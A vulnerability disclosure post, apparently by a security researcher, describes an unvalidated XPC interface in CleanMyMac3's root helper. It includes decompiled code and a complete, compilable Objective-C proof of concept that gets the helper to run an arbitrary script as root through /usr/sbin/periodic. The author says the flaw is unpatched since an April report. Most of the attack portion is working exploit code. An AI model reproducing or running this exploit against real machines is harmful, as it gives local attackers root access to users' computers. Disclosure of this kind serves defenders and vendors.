CleanMyMac3 installs a rooted helper *com.macpaw.CleanMyMac3.Agent*, and its XPC interface does not validate anything. In CMPrivilegedOperationprotocol, there are actually more than one way to execute privileged code. The most straight forward one is to use periodic: void __cdecl -[CMPriviligedOperations runPeriodicScript:withReply:](CMPriviligedOperations *self, SEL a2, id a3, id a4) { id v4; // rbx __int64 v5; // r14 __int64 v6; // rdx __int64 v7; // r12 void *v8; // rax __int64 v9; // rbx __int64 v10; // [rsp+8h] [rbp-38h] v4 = a4; v5 = objc_retain(a3, a2, a3); v7 = objc_retain(v4, a2, v6); v10 = v5; v8 = objc_msgSend(&OBJC_CLASS___NSArray, "arrayWithObjects:count:", &v10, 1LL); v9 = objc_retainAutoreleasedReturnValue(v8); +[CMTaskRunner launchTaskAndGetTermStatusWithCmd:arguments:]( &OBJC_CLASS___CMTaskRunner, "launchTaskAndGetTermStatusWithCmd:arguments:", CFSTR("/usr/sbin/periodic"), v9); objc_release(v5); objc_release(v9); if ( v7 ) (*(void (__fastcall **)(__int64, signed __int64, _QWORD))(v7 + 16))(v7, 1LL, 0LL); objc_release(v7); } Simply give periodic a directory, it will execute every shell scripts inside. Here's a PoC: // clang -framework Foundation -o messup && ./messup #import #import @protocol CMPrivilegedOperation - (void)sizeOfItemAtPath:(NSString *)arg1 reply:(void (^)(long long, NSError *))arg2; - (void)removeDiagnosticLogsWithReply:(void (^)(NSString *, long long, NSString *, NSError *))arg1; - (void)flushDNSWithReply:(void (^)(BOOL, NSError *))arg1; - (void)removeLibraryFromLauchdConf:(NSString *)arg1 withReply:(void (^)(BOOL, NSError *))arg2; - (void)removeGlobalLoginItemForAppWithPath:(NSString *)arg1 withReply:(void (^)(BOOL, NSError *))arg2; - (void)startSpotlightReindexWithReply:(void (^)(BOOL, NSError *))arg1; - (void)runPeriodicScript:(NSString *)arg1 withReply:(void (^)(BOOL, NSError *))arg2; - (void)repairPermissionsWithReply:(void (^)(BOOL, int, NSString *))arg1; - (void)stopStartupItem:(NSString *)arg1 withReply:(void (^)(BOOL, NSError *))arg2; - (void)startStartupItem:(NSString *)arg1 withReply:(void (^)(BOOL, NSError *))arg2; - (void)removeSMLoginItem:(NSString *)arg1 withReply:(void (^)(BOOL, NSError *))arg2; - (void)disableLaunchdAgentAtPath:(NSString *)arg1 withReply:(void (^)(BOOL, NSError *))arg2; - (void)enableLaunchdAgentAtPath:(NSString *)arg1 withReply:(void (^)(BOOL, NSError *))arg2; - (void)removeLaunchdAgentAtPath:(NSString *)arg1 withReply:(void (^)(BOOL, NSError *))arg2; - (void)slimBinaryWithPath:(NSString *)arg1 archs:(NSArray *)arg2 withReply:(void (^)(BOOL, NSError *))arg3; - (void)removeASLWithReply:(void (^)(BOOL, NSError *))arg1; - (void)removeKextAtPath:(NSString *)arg1 withReply:(void (^)(BOOL, NSError *))arg2; - (void)removePackageWithID:(NSString *)arg1 withReply:(void (^)(BOOL, NSError *))arg2; - (void)truncateFileAtPath:(NSString *)arg1 withReply:(void (^)(BOOL, NSError *))arg2; - (void)moveToTrashItemAtPath:(NSString *)arg1 withReply:(void (^)(BOOL, NSError *))arg2; - (void)securelyRemoveItemAtPath:(NSString *)arg1 withReply:(void (^)(BOOL, NSError *))arg2; - (void)removeItemAtPath:(NSString *)arg1 withReply:(void (^)(BOOL, NSError *))arg2; - (void)moveItemAtPath:(NSString *)arg1 toPath:(NSString *)arg2 withReply:(void (^)(BOOL, NSError *))arg3; - (void)echo:(NSString *)arg1 withReply:(void (^)(NSString *, NSError *))arg2; - (void)pleaseTerminate; @end int main(int argc, const char *argv[]) { // write payload script NSError *err; NSString *identifier = [[NSProcessInfo processInfo] globallyUniqueString]; NSString *tmp = [NSTemporaryDirectory() stringByAppendingPathComponent:identifier]; NSFileManager *fileManager = [NSFileManager defaultManager]; [fileManager createDirectoryAtPath:tmp withIntermediateDirectories:YES attributes:nil error:&err]; if (err) { NSLog(@"failed to create directory %@\nreason: %@", tmp, err); exit(-1); } NSString *executable = [tmp stringByAppendingPathComponent:@""]; NSURL *url = [NSURL fileURLWithPath:executable isDirectory:NO]; [@"id > /hello.txt" writeToURL:url atomically:NO encoding:NSStringEncodingConversionAllowLossy error:&err]; if (err) { NSLog(@"failed to write to %@\nreason: %@", url, err); exit(-1); } [fileManager setAttributes:@{ NSFilePosixPermissions : @0777 } ofItemAtPath:executable error:&err]; if (err) { NSLog(@"failed to set executable\nreason: %@", err); exit(-1); } // run NSXPCConnection *connection = [[NSXPCConnection alloc] initWithMachServiceName:@"com.macpaw.CleanMyMac3.Agent" options:NSXPCConnectionPrivileged]; connection.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(CMPrivilegedOperation)]; dispatch_semaphore_t semaphore = dispatch_semaphore_create(0); [connection resume]; [connection.remoteObjectProxy runPeriodicScript:tmp withReply:^(BOOL status, NSError *err) { if (err) NSLog(@"failed: %@", err); else NSLog(@"OK"); dispatch_semaphore_signal(semaphore); }]; dispatch_semaphore_wait(semaphore, DISPATCH_TIME_FOREVER); NSLog(@"done"); return 0; } I reported this issue in April, but they havenat release any patch yet.